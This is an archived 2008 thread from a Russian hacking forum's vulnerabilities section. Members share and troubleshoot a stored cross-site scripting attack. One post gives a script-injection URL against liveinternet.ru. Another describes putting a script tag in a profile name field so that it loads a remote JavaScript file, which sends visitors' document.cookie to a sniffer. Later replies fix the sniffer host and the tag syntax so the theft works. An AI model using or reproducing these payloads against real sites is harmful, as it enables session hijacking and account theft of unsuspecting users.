ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

/////////////
  #1  
Старый 12.11.2008, 19:07
Аватар для Zinus
Zinus
Banned
Регистрация: 08.08.2008
Сообщений: 31
Провел на форуме:
297671

Репутация: 32
По умолчанию /////////////

////////////

Последний раз редактировалось Zinus; 03.01.2009 в 04:19..
 
Ответить с цитированием

  #2  
Старый 12.11.2008, 19:09
Аватар для DVD_RW
DVD_RW
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме:
3248203

Репутация: 628


По умолчанию

=\ хацкер!!! ;D
 
Ответить с цитированием

  #3  
Старый 12.11.2008, 19:10
Аватар для Zinus
Zinus
Banned
Регистрация: 08.08.2008
Сообщений: 31
Провел на форуме:
297671

Репутация: 32
По умолчанию

Объяснил для тех кто не соображает.
 
Ответить с цитированием

  #4  
Старый 12.11.2008, 19:14
Аватар для Kernet
Kernet
Постоянный
Регистрация: 28.09.2008
Сообщений: 456
Провел на форуме:
2244151

Репутация: 404
Отправить сообщение для Kernet с помощью ICQ
По умолчанию

Ога,пантанулся,надо было у себя держать,щас ее быстро прикроют.
 
Ответить с цитированием

  #5  
Старый 12.11.2008, 19:23
Аватар для [:|||||:]
[:|||||:]
Banned
Регистрация: 29.05.2008
Сообщений: 116
Провел на форуме:
447871

Репутация: 208
Отправить сообщение для [:|||||:] с помощью ICQ Отправить сообщение для [:|||||:] с помощью AIM Отправить сообщение для [:|||||:] с помощью MSN Отправить сообщение для [:|||||:] с помощью Yahoo
По умолчанию

http://forum.antichat.ru/showpost.php?p=883295&postcount=269
 
Ответить с цитированием

  #6  
Старый 18.11.2008, 21:16
Аватар для E1ephant
E1ephant
Новичок
Регистрация: 18.11.2008
Сообщений: 2
Провел на форуме:
5346

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zinus  
сорри,Не знал, удаляйте значит топик
+1
 
Ответить с цитированием

  #7  
Старый 19.11.2008, 11:22
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

http://www.liveinternet.ru/tests.php?cmd=show&session_id=a2377cc8c3a9eec8d990 121c03cbf124&order=%22%3E%3Cscript%3Ealert('%EF%E0 %F1%F1%E8%E2%EA%E0')%3C/script%3E
 
Ответить с цитированием

  #8  
Старый 01.12.2008, 18:07
Аватар для ickhz
ickhz
Новичок
Регистрация: 01.12.2008
Сообщений: 7
Провел на форуме:
9272

Репутация: 0
По умолчанию

Цитата:
Чтобы обойти ограничение на кол-во символов нужно залить js файл к себе на хост, а в поле "Имя" вставить <script src="http://site/file.js"></script>.
Создаю аккаунт на бесплатном хостинге holm.ru , заливаю туда следующий скрипт, который должен отправлять куки зашедшего на сниффер:

img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

в файле 1.js, итак пишу ссылку <script>http://hzz.h18.ru/1.js</script> в "Имя".
Захожу в профиль, после этого сразу открываю http://old.antichat.ru/sniff/log.php . И ничего нового на сниффер не ушло.

Я не очень хорошо разбираюсь в javascript, но вроде-бы это должно работать?? Подскажите, что здесь не так?
 
Ответить с цитированием

  #9  
Старый 01.12.2008, 18:11
Аватар для DimOnOID
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от ickhz  
Создаю аккаунт на бесплатном хостинге holm.ru , заливаю туда следующий скрипт, который должен отправлять куки зашедшего на сниффер:

img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

в файле 1.js, итак пишу ссылку <script>http://hzz.h18.ru/1.js</script> в "Имя".
Захожу в профиль, после этого сразу открываю http://old.antichat.ru/sniff/log.php . И ничего нового на сниффер не ушло.

Я не очень хорошо разбираюсь в javascript, но вроде-бы это должно работать?? Подскажите, что здесь не так?
указывай

http://old.antichat.ru/cgi-bin/s.jpg
а не
http://antichat.ru/cgi-bin/s.jpg
 
Ответить с цитированием

  #10  
Старый 01.12.2008, 18:12
Аватар для Antiakvt
Antiakvt
Познающий
Регистрация: 14.09.2007
Сообщений: 64
Провел на форуме:
224270

Репутация: 13
Отправить сообщение для Antiakvt с помощью ICQ Отправить сообщение для Antiakvt с помощью Yahoo
По умолчанию

Код:
<script src="http://hzz.h18.ru/1.js"> 
</script>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Сценарии/CMF/СMS 7 04.02.2010 02:55
Активная XSS Mail.ru (IE6) / 09.11.08 brain[pillow] Уязвимости 11 14.11.2008 03:12
!!! phpBB2 новая активная XSS !!! KIR@PRO Форумы 15 25.05.2008 13:16
Активная XSS на mail.ru Dronga E-Mail 69 05.04.2008 01:56
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ